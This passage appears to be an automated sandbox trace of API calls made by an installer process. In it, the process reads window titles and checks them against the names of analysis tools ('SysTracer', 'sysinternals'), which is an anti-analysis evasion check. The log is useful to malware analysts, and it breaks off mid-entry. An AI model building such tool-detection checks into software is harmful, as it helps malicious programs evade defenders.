lstrcpynA (in: lpString1=0x337684, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.448] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.448] lstrlenA (lpString="3399936") returned 7 [0158.448] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.448] lstrcpynA (in: lpString1=0x40a418, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.448] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.448] lstrcpynA (in: lpString1=0x337acc, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.449] lstrcpynA (in: lpString1=0x432800, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.449] lstrcpynA (in: lpString1=0x40a418, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.449] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.449] lstrcpynA (in: lpString1=0x337684, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.449] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.449] lstrlenA (lpString="") returned 0 [0158.449] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.449] lstrcpynA (in: lpString1=0x40a418, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.449] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.449] lstrcpynA (in: lpString1=0x337acc, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.449] lstrcpynA (in: lpString1=0x432c00, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.449] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.449] lstrlenA (lpString="") returned 0 [0158.449] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.449] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.449] lstrlenA (lpString="") returned 0 [0158.449] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.449] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.449] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.449] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.449] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.449] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.449] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.449] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.450] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.450] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.450] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.450] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.450] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.450] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.450] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.450] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.450] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.450] lstrcpynA (in: lpString1=0x340df8, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.450] lstrcpynA (in: lpString1=0x341200, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.450] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.450] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.451] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.451] strstr (_Str="Network Flyout", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.451] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.451] lstrcpynA (in: lpString1=0x340df8, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.451] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.451] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.451] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.451] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.451] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.451] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.451] lstrlenA (lpString="0") returned 1 [0158.451] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.451] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.451] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.451] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.451] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.451] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.451] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.451] lstrlenA (lpString="0") returned 1 [0158.452] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.452] lstrlenA (lpString="Network Flyout") returned 14 [0158.452] lstrcpynA (in: lpString1=0x33723c, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.452] lstrcpynA (in: lpString1=0x337684, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.452] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.452] lstrlenA (lpString="3399936") returned 7 [0158.452] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.452] lstrcpynA (in: lpString1=0x40a418, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.452] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.452] lstrcpynA (in: lpString1=0x337acc, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.452] lstrcpynA (in: lpString1=0x432800, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.452] lstrcpynA (in: lpString1=0x40a418, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.452] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.452] lstrcpynA (in: lpString1=0x337684, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.452] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.452] lstrlenA (lpString="") returned 0 [0158.452] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.452] lstrcpynA (in: lpString1=0x40a418, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.452] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.452] lstrcpynA (in: lpString1=0x337acc, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.452] lstrcpynA (in: lpString1=0x432c00, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.452] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.452] lstrlenA (lpString="") returned 0 [0158.452] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.452] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.453] lstrlenA (lpString="") returned 0 [0158.453] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.453] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.453] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.453] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.453] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.453] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.453] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.453] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.453] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.453] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.453] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.453] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.453] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.453] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.454] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.454] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.454] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.454] lstrcpynA (in: lpString1=0x341200, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.454] lstrcpynA (in: lpString1=0x340df8, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.454] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.454] lstrcpynA (in: lpString1=0x3401e0, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.454] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.454] strstr (_Str="Network Flyout", _SubStr="sysinternals") returned 0x0 [0158.454] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.454] lstrcpynA (in: lpString1=0x341200, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.454] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.454] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.454] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.454] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.454] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.455] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.455] lstrlenA (lpString="0") returned 1 [0158.455] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.455] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.455] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.455] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.455] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.455] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.455] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.455] lstrlenA (lpString="0") returned 1 [0158.455] lstrcpynA (in: lpString1=0x33723c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.455] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.455] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.455] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.455] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.455] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.455] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.455] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.455] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.455] lstrlenA (lpString="3399936") returned 7 [0158.455] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.456] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.456] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.456] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.456] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.456] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.456] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.456] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.456] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.456] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.456] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65848") returned 5 [0158.456] lstrcpyA (in: lpString1=0x430400, lpString2="65848" | out: lpString1="65848") returned="65848" [0158.456] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.456] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.456] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.457] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.457] lstrlenA (lpString="callback1") returned 9 [0158.457] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.457] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.457] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.457] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.457] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.457] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.457] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.457] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.457] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.457] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.457] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.457] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.457] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.457] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.457] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.457] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.458] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.458] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.458] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.458] lstrcpynA (in: lpString1=0x341200, lpString2="65848", iMaxLength=1024 | out: lpString1="65848") returned="65848" [0158.458] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.458] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.458] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.458] GetWindowTextA (in: hWnd=0x10138, lpString=0x340df8, nMaxCount=1024 | out: lpString="Task Switching") returned 14 [0158.458] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.458] lstrcpynA (in: lpString1=0x3401e0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.458] lstrcpyA (in: lpString1=0x430800, lpString2="Task Switching" | out: lpString1="Task Switching") returned="Task Switching" [0158.458] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65848") returned 5 [0158.458] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.458] lstrcpynA (in: lpString1=0x40ac18, 